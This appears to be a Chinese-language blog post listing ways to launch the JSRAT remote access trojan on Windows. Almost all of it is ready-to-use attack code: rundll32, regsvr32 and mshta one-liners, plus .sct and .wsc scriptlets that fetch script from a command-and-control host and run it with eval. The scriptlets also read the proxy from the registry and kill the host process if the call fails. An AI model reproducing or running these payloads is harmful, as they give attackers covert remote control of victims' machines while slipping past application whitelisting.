JSRAT几种启动方式

1.默认方式

1
rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();h=new%20ActiveXObject("WinHttp.WinHttpRequest.5.1");h.Open("GET","http://127.0.0.1:8081/connect",false);try{h.Send();b=h.ResponseText;eval(b);}catch(e){new%20ActiveXObject("WScript.Shell").Run("cmd /c taskkill /f /im rundll32.exe",0,true);}%

2.Use SCT

运行计算器

1
regsvr32 /u /s /i:http://urlto/calc.sct scrobj.dll

calc.sct:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
<?XML version="1.0"?>
<scriptlet>

<registration
description="Empire"
progid="Empire"
version="1.00"
classid="{20001111-0000-0000-0000-0000FEEDACDC}"
>
<!-- regsvr32 /s /i"C:\Bypass\Backdoor.sct" scrobj.dll -->
<!-- regsvr32 /s /i:http://server/Backdoor.sct scrobj.dll -->
<!-- That should work over a proxy and SSL/TLS... -->
<!-- Proof Of Concept - Casey Smith @subTee -->
<script language="JScript">
<![CDATA[

var r = new ActiveXObject("WScript.Shell").Run("calc.exe");

]]>
</script>
</registration>

<public>
<method name="Exec"></method>
</public>
<script language="JScript">
<![CDATA[

function Exec()
{
var r = new ActiveXObject("WScript.Shell").Run("cmd.exe");
}

]]>
</script>

</scriptlet>

运行JSRAT:

1
regsvr32 /s /n /u /i:http://urlto/JSRAT.sct scrobj.dll

JSRAT.sct

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
<?XML version="1.0"?>
<scriptlet>
<registration
progid="ShortJSRAT"
classid="{10001111-0000-0000-0000-0000FEEDACDC}" >
<!-- Learn from Casey Smith @subTee -->
<script language="JScript">
<![CDATA[

rat="rundll32.exe javascript:\"\\..\\mshtml,RunHTMLApplication \";document.write();h=new%20ActiveXObject(\"WinHttp.WinHttpRequest.5.1\");w=new%20ActiveXObject(\"WScript.Shell\");try{v=w.RegRead(\"HKCU\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Internet%20Settings\\\\ProxyServer\");q=v.split(\"=\")[1].split(\";\")[0];h.SetProxy(2,q);}catch(e){}h.Open(\"GET\",\"http://127.0.0.1/connect\",false);try{h.Send();B=h.ResponseText;eval(B);}catch(e){new%20ActiveXObject(\"WScript.Shell\").Run(\"cmd /c taskkill /f /im rundll32.exe\",0,true);}";
new ActiveXObject("WScript.Shell").Run(rat,0,true);

]]>
</script>
</registration>
</scriptlet>

3.Use WSC

运行计算器

1
rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();GetObject("script:http://urlto/calc.wsc")

calc.wsc

1
2
3
4
5
6
7
8
9
10
11
12
13
<?xml version="1.0"?>

<package>
<component id="testCalc">

<script language="JScript">
<![CDATA[
var r = new ActiveXObject("WScript.Shell").Run("calc.exe");
]]>
</script>

</component>
</package>

运行JSRAT

1
rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();GetObject("script:http://urlto/JSRAT.wsc")

JSRAT.wsc:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
<?xml version="1.0"?>

<package>
<component id="testCalc">

<script language="JScript">
<![CDATA[
rat="rundll32.exe javascript:\"\\..\\mshtml,RunHTMLApplication \";document.write();h=new%20ActiveXObject(\"WinHttp.WinHttpRequest.5.1\");w=new%20ActiveXObject(\"WScript.Shell\");try{v=w.RegRead(\"HKCU\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Internet%20Settings\\\\ProxyServer\");q=v.split(\"=\")[1].split(\";\")[0];h.SetProxy(2,q);}catch(e){}h.Open(\"GET\",\"http://127.0.0.1/connect\",false);try{h.Send();B=h.ResponseText;eval(B);}catch(e){new%20ActiveXObject(\"WScript.Shell\").Run(\"cmd /c taskkill /f /im rundll32.exe\",0,true);}";
new ActiveXObject("WScript.Shell").Run(rat,0,true);
]]>
</script>

</component>
</package>

4.Use MSHTA

1
mshta javascript:"\..\mshtml,RunHTMLApplication ";document.write();h=new%20ActiveXObject("WinHttp.WinHttpRequest.5.1");h.Open("GET","http://192.168.2.101:9998/connect",false);try{h.Send();b=h.ResponseText;eval(b);}catch(e){new%20ActiveXObject("WScript.Shell").Run("cmd /c taskkill /f /im mshta.exe",0,true);}
------本文结束,感谢阅读------